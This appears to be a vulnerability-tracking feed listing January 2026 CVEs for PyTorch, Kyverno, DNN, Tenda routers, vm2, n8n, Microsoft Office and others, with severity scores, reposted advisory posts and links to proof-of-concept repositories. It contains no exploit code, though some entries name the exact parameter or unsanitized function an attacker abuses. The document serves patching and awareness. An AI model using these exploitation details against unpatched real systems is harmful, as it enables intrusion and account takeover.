### Summary A vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., weights_only=True)`, can corrupt memory and potentially lead to arbitrary code execution. ### Vulnerability Details The `weights_only=True` unpickler failed to properly validate pickle opcodes and storage metadata, allowing:

thehackerwire@mastodon.social at 2026-01-27T23:02:06.000Z ##

🟠 CVE-2026-24747 - High (8.8)

PyTorch is a Python package that provides tensor computation. Prior to version 2.10.0, a vulnerability in PyTorch's `weights_only` unpickler allows an attacker to craft a malicious checkpoint file (`.pth`) that, when loaded with `torch.load(..., w...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-22039
(10.0 CRITICAL)

EPSS: 0.04%

updated 2026-01-29T03:31:32

1 posts

### Summary A critical authorization boundary bypass in namespaced Kyverno Policy [apiCall](https://kyverno.io/docs/policy-types/cluster-policy/external-data-sources/#url-paths). The resolved `urlPath` is executed using the Kyverno admission controller ServiceAccount, with no enforcement that the request is limited to the policy’s namespace. As a result, any authenticated user with permission to

thehackerwire@mastodon.social at 2026-01-27T18:00:43.000Z ##

🔴 CVE-2026-22039 - Critical (9.9)

Kyverno is a policy engine designed for cloud native platform engineering teams. Versions prior to 1.16.3 and 1.15.3 have a critical authorization boundary bypass in namespaced Kyverno Policy apiCall. The resolved `urlPath` is executed using the K...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24838
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-01-28T21:34:04

2 posts

Module title supports richtext which could include scripts that would execute in certain scenarios.

thehackerwire@mastodon.social at 2026-01-28T02:01:08.000Z ##

🔴 CVE-2026-24838 - Critical (9.1)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:30.000Z ##

🔴 CVE-2026-24838 - Critical (9.1)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Prior to versions 9.13.10 and 10.2.0, module title supports richtext which could include scripts that would execute in certain scenarios...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-57792
(10.0 CRITICAL)

EPSS: 0.13%

updated 2026-01-28T21:31:21

2 posts

Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user input in a web application endpoint. An attacker can supply crafted input that is executed as part of backend database queries. The issue is exploitable without authentication, significantly raising the risk.

thehackerwire@mastodon.social at 2026-01-28T20:07:18.000Z ##

🔴 CVE-2025-57792 - Critical (10)

Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user input in a web application endpoint. An attacker can supply crafted input that is executed as part of backend database queries...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T20:06:33.000Z ##

🔴 CVE-2025-57792 - Critical (10)

Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user input in a web application endpoint. An attacker can supply crafted input that is executed as part of backend database queries...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-57793
(8.6 HIGH)

EPSS: 0.11%

updated 2026-01-28T21:31:21

2 posts

Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user-supplied input in a web application component. Crafted input can be executed as part of backend database queries. The issue is exploitable without authentication, significantly elevating the risk.

thehackerwire@mastodon.social at 2026-01-28T20:07:07.000Z ##

🟠 CVE-2025-57793 - High (8.6)

Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user-supplied input in a web application component. Crafted input can be executed as part of backend database queries. The issue is...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T20:06:37.000Z ##

🟠 CVE-2025-57793 - High (8.6)

Explorance Blue versions prior to 8.14.9 contain a SQL injection vulnerability caused by insufficient validation of user-supplied input in a web application component. Crafted input can be executed as part of backend database queries. The issue is...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24430
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-28T20:16:51.880000

1 posts

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over unencrypted HTTP by default, credentials may be exposed to network-based interception.

thehackerwire@mastodon.social at 2026-01-29T05:20:24.000Z ##

🟠 CVE-2026-24430 - High (7.5)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) disclose sensitive account credentials in cleartext within HTTP responses generated by the maintenance interface. Because the management interface is accessible over un...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24436
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-01-28T19:57:17.200000

1 posts

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) do not enforce rate limiting or account lockout mechanisms on authentication endpoints. This allows attackers to perform unrestricted brute-force attempts against administrative credentials.

thehackerwire@mastodon.social at 2026-01-29T05:20:04.000Z ##

🔴 CVE-2026-24436 - Critical (9.8)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) do not enforce rate limiting or account lockout mechanisms on authentication endpoints. This allows attackers to perform unrestricted brute-force attempts against admin...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24440
(8.8 HIGH)

EPSS: 0.04%

updated 2026-01-28T19:20:05.660000

1 posts

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) allow account passwords to be changed through the maintenance interface without requiring verification of the existing password. This enables unauthorized password changes when access to the affected endpoint is obtained.

thehackerwire@mastodon.social at 2026-01-29T05:20:14.000Z ##

🟠 CVE-2026-24440 - High (8.8)

Shenzhen Tenda W30E V2 firmware versions up to and including V16.01.0.19(5037) allow account passwords to be changed through the maintenance interface without requiring verification of the existing password. This enables unauthorized password chan...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24837
(7.7 HIGH)

EPSS: 0.04%

updated 2026-01-28T16:34:17

1 posts

A module friendly name could include scripts that will run during some module operations in the Persona Bar.

thehackerwire@mastodon.social at 2026-01-28T00:46:39.000Z ##

🟠 CVE-2026-24837 - High (7.6)

DNN (formerly DotNetNuke) is an open-source web content management platform (CMS) in the Microsoft ecosystem. Starting in version 9.0.0 and prior to versions 9.13.10 and 10.2.0, a module friendly name could include scripts that will run during som...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24477
(7.5 HIGH)

EPSS: 0.02%

updated 2026-01-28T15:59:06.483000

1 posts

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKey could be exposed in plain text to unauthenticated users via the `/api/setup-complete` endpoint. Leakage of QdrantApiKey allows an unauthenticated attac

thehackerwire@mastodon.social at 2026-01-29T02:12:19.000Z ##

🟠 CVE-2026-24477 - High (7.5)

AnythingLLM is an application that turns pieces of content into context that any LLM can use as references during chatting. If AnythingLLM prior to version 1.10.0 is configured to use Qdrant as the vector database with an API key, this QdrantApiKe...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21569
(7.9 HIGH)

EPSS: 0.05%

updated 2026-01-28T15:31:30

2 posts

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server. This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated attacker to access local and remote content which has high impact to confidentiality, low impact to integrity, high impact to availability, and requires no

thehackerwire@mastodon.social at 2026-01-28T02:00:58.000Z ##

🟠 CVE-2026-21569 - High (7.9)

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.

This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-28T02:00:20.000Z ##

🟠 CVE-2026-21569 - High (7.9)

This High severity XXE (XML External Entity Injection) vulnerability was introduced in version 7.1.0 of Crowd Data Center and Server.

This XXE (XML External Entity Injection) vulnerability, with a CVSS Score of 7.9, allows an authenticated att...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0844
(8.8 HIGH)

EPSS: 0.03%

updated 2026-01-28T12:30:36

1 posts

The Simple User Registration plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7 due to insufficient restriction on the 'profile_save_field' function. This makes it possible for authenticated attackers, with minimal permissions such as a subscriber, to modify their user role by supplying the 'wp_capabilities' parameter during a profile update.

thehackerwire@mastodon.social at 2026-01-28T12:30:49.000Z ##

🟠 CVE-2026-0844 - High (8.8)

The Simple User Registration plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 6.7 due to insufficient restriction on the 'profile_save_field' function. This makes it possible for authenticated attackers,...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-14386
(8.8 HIGH)

EPSS: 0.11%

updated 2026-01-28T12:30:35

1 posts

The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the 'generate_sso_url' and 'validate_sso_token' functions in versions 2.4.4 to 2.5.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to extract the 'nonce_tok

thehackerwire@mastodon.social at 2026-01-28T13:02:22.000Z ##

🟠 CVE-2025-14386 - High (8.8)

The Search Atlas SEO – Premier SEO Plugin for One-Click WP Publishing & Integrated AI Optimization plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the 'generate_sso_url' and 'validate_sso_token' f...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-0702
(7.5 HIGH)

EPSS: 0.03%

updated 2026-01-28T09:30:35

1 posts

The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'fields' parameter in all versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into alread

thehackerwire@mastodon.social at 2026-01-28T10:01:20.000Z ##

🟠 CVE-2026-0702 - High (7.5)

The VidShop – Shoppable Videos for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the 'fields' parameter in all versions up to, and including, 1.1.4 due to insufficient escaping on the user supplied parameter and ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-59106
(8.8 HIGH)

EPSS: 0.06%

updated 2026-01-27T21:32:51

1 posts

The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabilities it is possible to directly execute commands with highest privileges.

thehackerwire@mastodon.social at 2026-01-27T21:51:56.000Z ##

🟠 CVE-2025-59106 - High (8.8)

The binary serving the web server and executing basically all actions launched from the Web UI is running with root privileges. This is against the least privilege principle. If an attacker is able to execute code on the system via other vulnerabi...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-21589
(9.8 CRITICAL)

EPSS: 0.03%

updated 2026-01-27T21:31:56

2 posts

An Authentication Bypass Using an Alternate Path or Channel vulnerability in Juniper Networks Session Smart Router may allows a network-based attacker to bypass authentication and take administrative control of the device. This issue affects Session Smart Router:  * from 5.6.7 before 5.6.17,  * from 6.0 before 6.0.8 (affected from 6.0.8), * from 6.1 before 6.1.12-lts,  * from 6.2

thehackerwire@mastodon.social at 2026-01-27T21:53:32.000Z ##

🔴 CVE-2025-21589 - Critical (9.8)

An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.

This issue affects Sess...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

thehackerwire@mastodon.social at 2026-01-27T21:51:55.000Z ##

🔴 CVE-2025-21589 - Critical (9.8)

An Authentication Bypass Using an
Alternate Path or Channel vulnerability in Juniper Networks Session Smart
Router may allows a network-based attacker to bypass authentication
and take administrative control of the device.

This issue affects Sess...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24881
(8.1 HIGH)

EPSS: 0.06%

updated 2026-01-27T21:31:49

1 posts

In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of service; however, there is also memory corruption that could lead to remote code execution.

thehackerwire@mastodon.social at 2026-01-27T19:29:52.000Z ##

🟠 CVE-2026-24881 - High (8.1)

In GnuPG before 2.5.17, a crafted CMS (S/MIME) EnvelopedData message carrying an oversized wrapped session key can cause a stack-based buffer overflow in gpg-agent during PKDECRYPT--kem=CMS handling. This can easily be leveraged for denial of serv...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-33234
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-27T18:32:29

2 posts

NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

AAKL@infosec.exchange at 2026-01-27T19:08:52.000Z ##

New advisory.

High severity NVIDIA runx vulnerability: CVE-2025-33234 nvidia.custhelp.com/app/answer #Nvidia #vulnerability #infosec

##

thehackerwire@mastodon.social at 2026-01-27T18:37:23.000Z ##

🟠 CVE-2025-33234 - High (7.8)

NVIDIA runx contains a vulnerability where an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, denial of service, escalation of privileges, information disclosure, and data tampering.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24875
(7.8 HIGH)

EPSS: 0.01%

updated 2026-01-27T18:32:28

1 posts

Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.

thehackerwire@mastodon.social at 2026-01-27T16:30:13.000Z ##

🟠 CVE-2026-24875 - High (7.8)

Integer Overflow or Wraparound vulnerability in yoyofr modizer.This issue affects modizer: before 4.1.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24869
(8.1 HIGH)

EPSS: 0.03%

updated 2026-01-27T18:32:24

1 posts

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox < 147.0.2.

thehackerwire@mastodon.social at 2026-01-27T18:02:49.000Z ##

🟠 CVE-2026-24869 - High (8.1)

Use-after-free in the Layout: Scrolling and Overflow component. This vulnerability affects Firefox &lt; 147.0.2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21509
(7.8 HIGH)

EPSS: 4.74%

updated 2026-01-27T16:19:42.330000

10 posts

Reliance on untrusted inputs in a security decision in Microsoft Office allows an unauthorized attacker to bypass a security feature locally.

3 repos

https://github.com/ksk-itdk/KSK-ITDK-CVE-2026-21509-Mitigation

https://github.com/Ashwesker/Ashwesker-CVE-2026-21509

https://github.com/gavz/CVE-2026-21509-PoC

hackmag@infosec.exchange at 2026-01-29T10:00:03.000Z ##

⚪ Microsoft rushes to fix Office 0-day vulnerability actively exploited by hackers

🗨️ Microsoft developers have released out-of-band patches for a critical Office vulnerability that is already being actively exploited in attacks. The issue affects almost all versions of the product—from Office 2016 to Microsoft 365 Apps for Enterprise.

🔗 hackmag.com/news/cve-2026-2150

#news

##

youranonnewsirc@nerdculture.de at 2026-01-28T09:24:26.000Z ##

Here's a summary of recent important global, technology, and cybersecurity news:

Global: India has contained a Nipah virus outbreak (Jan 28, 2026). The EU approved a ban on Russian gas imports, effective from 2027 (Jan 27, 2026).

Technology: The EU is pressing Google to share AI and search data under new regulations (Jan 27, 2026). Samsung is nearing Nvidia approval for advanced HBM4 AI memory chips (Jan 27, 2026). Fujitsu developed AI for space weather prediction (Jan 28, 2026).

Cybersecurity: Microsoft issued emergency patches for an actively exploited Office zero-day vulnerability (CVE-2026-21509) (Jan 27, 2026). Fortinet patched a critical FortiOS SSO authentication bypass (CVE-2026-24858) under active exploitation (Jan 28, 2026). AI-powered polymorphic phishing attacks are also a growing concern (Jan 28, 2026).

#News #Anonymous #AnonNews_irc

##

LLMs@activitypub.awakari.com at 2026-01-27T21:04:32.000Z ## Microsoft corrige de urgencia un 0-day de Office Microsoft ha publicado una actualización de emergencia para corregir CVE-2026-21509, una vulnerabilidad en Microsoft Office que ya está siendo exp...

#Seguridad

Origin | Interest | Match ##

decio@infosec.exchange at 2026-01-27T14:24:01.000Z ##

[VULN] ⚠️"Une faille de Microsoft Office est activement exploitée par des pirates "

(NdR : cybercriminels et/ou opérateurs malveillants agissant pour le compte d’une entité soutenant les intérêts géopolitiques d’un État)

"Microsoft alerte sur une nouvelle faille critique dans Office. Déjà exploitée par des cybercriminels, la vulnérabilité permet de désactiver la sécurité mise en place par Microsoft. L’éditeur a commencé à déployer d’urgence un correctif pour Microsoft 365 et les versions récentes d’Office.

Pour protéger les internautes contre les attaques en cours, Microsoft a déployé une mise à jour qui « corrige la vulnérabilité qui contourne les mesures d’atténuation » d’Office. Les utilisateurs de Microsoft 365 et Microsoft Office sont invités à installer le correctif sans tarder.

Les utilisateurs d’Office 2021 et des versions ultérieures « seront automatiquement protégés grâce à une modification côté serveur, mais devront redémarrer leurs applications Office pour que cette modification prenne effet ». Il n’y a donc rien à faire, sauf redémarrer vos applications. Enfin, Microsoft n’a pas encore corrigé le tir sur Office 2016 et 2019. En attendant un correctif, Microsoft propose des mesures d’atténuation à ses utilisateurs."
👇
01net.com/actualites/faille-mi

🔬
⬇️
vulnerability.circl.lu/vuln/CV

📜
⬇️
msrc.microsoft.com/update-guid

💬
⬇️
infosec.pub/post/41135178

#CyberVeille #Microsoft #CVE_2026_21509

##

patrickcmiller@infosec.exchange at 2026-01-27T12:42:00.000Z ##

Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation thehackernews.com/2026/01/micr

##

jbhall56@infosec.exchange at 2026-01-27T12:36:19.000Z ##

The vulnerability, tracked as CVE-2026-21509, carries a CVSS score of 7.8 out of 10.0. It has been described as a security feature bypass in Microsoft Office. thehackernews.com/2026/01/micr

##

sambowne@infosec.exchange at 2026-01-27T11:42:39.000Z ##

Microsoft Office Zero-Day (CVE-2026-21509) - Emergency Patch Issued for Active Exploitation

thehackernews.com/2026/01/micr

##

benzogaga33@mamot.fr at 2026-01-27T10:40:02.000Z ##

Microsoft a patché en urgence une faille de sécurité zero-day dans Office : CVE-2026-21509 it-connect.fr/microsoft-office #ActuCybersécurité #Cybersécurité #Vulnérabilité #Microsoft #Office

##

beyondmachines1@infosec.exchange at 2026-01-27T09:01:02.000Z ##

Microsoft Issues Emergency Patch for Actively Exploited Office Zero-Day

Microsoft released emergency updates for an actively exploited Office zero-day (CVE-2026-21509) that allows attackers to bypass OLE security protections when a user opens a malicious file.

**For everyone using Microsoft Office, this is important and urgent. Hackers attack with malicious MS Office documents. Restart all Microsoft 365 and Office 2021 applications immediately to trigger the service-side security fix. For older versions like Office 2016, apply registry workarounds until Microsoft releases a formal patch.**
#cybersecurity #infosec #attack #activeexploit
beyondmachines.net/event_detai

##

teezeh@ieji.de at 2026-01-27T08:31:49.000Z ##

„In Office 2016 bis Office 2024 (auch LTSC), sowie die Microsoft 365 Apps für Unternehmen steckt eine Sicherheitslücke, die aktiv ausgenutzt wird.“

deskmodder.de/blog/2026/01/27/

##

CVE-2026-1470
(9.9 CRITICAL)

EPSS: 0.31%

updated 2026-01-27T16:06:45.160000

5 posts

n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow Expression evaluation system. Expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficiently isolated from the underlying runtime. An authenticated attacker could abuse this behavior to execute arbitrary code with the privileges of the n8n

1 repos

https://github.com/Ashwesker/Ashwesker-CVE-2026-1470

beyondmachines1 at 2026-01-29T20:01:05.375Z ##

Critical n8n Sandbox Escapes Enable Remote Code Execution

n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.

**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**

beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-01-29T10:40:04.000Z ##

n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? it-connect.fr/n8n-cve-2026-147 #ActuCybersécurité #Cybersécurité #Vulnérabilité

##

beyondmachines1@infosec.exchange at 2026-01-29T20:01:05.000Z ##

Critical n8n Sandbox Escapes Enable Remote Code Execution

n8n reports two sandbox escape vulnerabilities, CVE-2026-1470 and CVE-2026-0863, that allow authenticated users to execute arbitrary code and take over self-hosted servers. These flaws bypass JavaScript and Python security filters by exploiting deprecated language features and specific interpreter behaviors.

**If you are using n8n, make sure it's isolated from the internet and accessible from trusted users only. Then patch n8n to version 1.123.17, 2.4.5 for CVE-2026-1470, and 1.123.14, 2.3.5 for CVE-2026-0863 or later. The CVE-2026-1470 patch is higher priority. Also configure Python nodes to run in 'External' mode for better process isolation.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

benzogaga33@mamot.fr at 2026-01-29T10:40:04.000Z ##

n8n – CVE-2026-1470 et CVE-2026-0863 : deux nouvelles failles patchées, comment se protéger ? it-connect.fr/n8n-cve-2026-147 #ActuCybersécurité #Cybersécurité #Vulnérabilité

##

thehackerwire@mastodon.social at 2026-01-27T15:22:28.000Z ##

🔴 CVE-2026-1470 - Critical (9.9)

n8n contains a critical Remote Code Execution (RCE) vulnerability in its workflow Expression evaluation system. Expressions supplied by authenticated users during workflow configuration may be evaluated in an execution context that is not sufficie...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21720
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-27T15:15:57.583000

1 posts

Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine blocks forever trying to send on an unbuffered channel. Sustained traffic with random hashes keeps tripping this timeout, so goroutine count grows linearly, e

thehackerwire@mastodon.social at 2026-01-27T10:00:28.000Z ##

🟠 CVE-2026-21720 - High (7.5)

Every uncached /avatar/:hash request spawns a goroutine that refreshes the Gravatar image. If the refresh sits in the 10-slot worker queue longer than three seconds, the handler times out and stops listening for the result, so that goroutine block...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-23864
(7.5 HIGH)

EPSS: 0.60%

updated 2026-01-27T14:59:34.073000

2 posts

Multiple denial of service vulnerabilities exist in React Server Components, affecting the following packages: react-server-dom-parcel, react-server-dom-turbopack, react-server-dom-webpack. The vulnerabilities are triggered by sending specially crafted HTTP requests to Server Function endpoints, and could lead to server crashes, out-of-memory exceptions or excessive CPU usage; depending on the vu

AAKL at 2026-01-29T17:28:21.816Z ##

New.

AhnLab: React Server Component Security Update Advisory (CVE-2026-23864) asec.ahnlab.com/en/92377/

##

AAKL@infosec.exchange at 2026-01-29T17:28:21.000Z ##

New.

AhnLab: React Server Component Security Update Advisory (CVE-2026-23864) asec.ahnlab.com/en/92377/ #vulnerability #infosec

##

CVE-2026-22709
(9.8 CRITICAL)

EPSS: 0.06%

updated 2026-01-27T14:59:34.073000

2 posts

vm2 is an open source vm/sandbox for Node.js. In vm2 prior to version 3.10.2, `Promise.prototype.then` `Promise.prototype.catch` callback sanitization can be bypassed. This allows attackers to escape the sandbox and run arbitrary code. In lib/setup-sandbox.js, the callback function of `localPromise.prototype.then` is sanitized, but `globalPromise.prototype.then` is not sanitized. The return value

beyondmachines1@infosec.exchange at 2026-01-28T08:01:02.000Z ##

Critical Sandbox Escape in vm2 Library Allows Remote Code Execution

A critical sandbox escape vulnerability in the vm2 Node.js library (CVE-2026-22709) allows attackers to bypass Promise sanitization and execute arbitrary system commands on the host server.

**If you're using the vm2 library for Node.js, immediately update to version 3.10.3 to fix CVE-2026-22709 - version 3.10.1 is NOT safe. If you can't update right away, stop running any untrusted code through vm2 or switch to stronger isolation methods like containers.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

oversecurity@mastodon.social at 2026-01-27T16:50:56.000Z ##

Critical sandbox escape flaw discovered in popular vm2 NodeJS library

A critical-severity vulnerability in the vm2 Node.js sandbox library, tracked as CVE-2026-22709, allows escaping the sandbox and executing...

🔗️ [Bleepingcomputer] link.is.it/hbFnIL

##

CVE-2025-41727
(7.8 HIGH)

EPSS: 0.02%

updated 2026-01-27T14:59:34.073000

1 posts

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

thehackerwire@mastodon.social at 2026-01-27T12:45:59.000Z ##

🟠 CVE-2025-41727 - High (7.8)

A local low privileged attacker can bypass the authentication of the Device Manager user interface, allowing them to perform privileged operations and gain administrator access.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-41726
(8.8 HIGH)

EPSS: 0.18%

updated 2026-01-27T14:59:34.073000

1 posts

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within privileged processes.

thehackerwire@mastodon.social at 2026-01-27T12:45:49.000Z ##

🟠 CVE-2025-41726 - High (8.8)

A low privileged remote attacker can execute arbitrary code by sending specially crafted calls to the web service of the Device Manager or locally via an API and can cause integer overflows which then may lead to arbitrary code execution within pr...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24828
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-27T14:59:34.073000

1 posts

Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is-Engine.This issue affects is-Engine: before 3.3.4.

thehackerwire@mastodon.social at 2026-01-27T10:27:15.000Z ##

🟠 CVE-2026-24828 - High (7.5)

Missing Release of Memory after Effective Lifetime vulnerability in Is-Daouda is-Engine.This issue affects is-Engine: before 3.3.4.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24827
(7.5 HIGH)

EPSS: 0.04%

updated 2026-01-27T12:31:24

1 posts

Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affects Commander-Genius: before Release refs/pull/358/merge.

thehackerwire@mastodon.social at 2026-01-27T10:27:06.000Z ##

🟠 CVE-2026-24827 - High (7.5)

Out-of-bounds Write vulnerability in gerstrong Commander-Genius.This issue affects Commander-Genius: before Release refs/pull/358/merge.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-24830
(9.8 CRITICAL)

EPSS: 0.04%

updated 2026-01-27T12:31:24

1 posts

Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects IronOS: before v2.23-rc2.

thehackerwire@mastodon.social at 2026-01-27T10:26:56.000Z ##

🔴 CVE-2026-24830 - Critical (9.8)

Integer Overflow or Wraparound vulnerability in Ralim IronOS.This issue affects IronOS: before v2.23-rc2.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-21721
(8.1 HIGH)

EPSS: 0.03%

updated 2026-01-27T09:30:36

1 posts

The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashboards. This is an organization‑internal privilege escalation.

thehackerwire@mastodon.social at 2026-01-27T10:00:37.000Z ##

🟠 CVE-2026-21721 - High (8.1)

The dashboard permissions API does not verify the target dashboard scope and only checks the dashboards.permissions:* action. As a result, a user who has permission management rights on one dashboard can read and modify permissions on other dashbo...

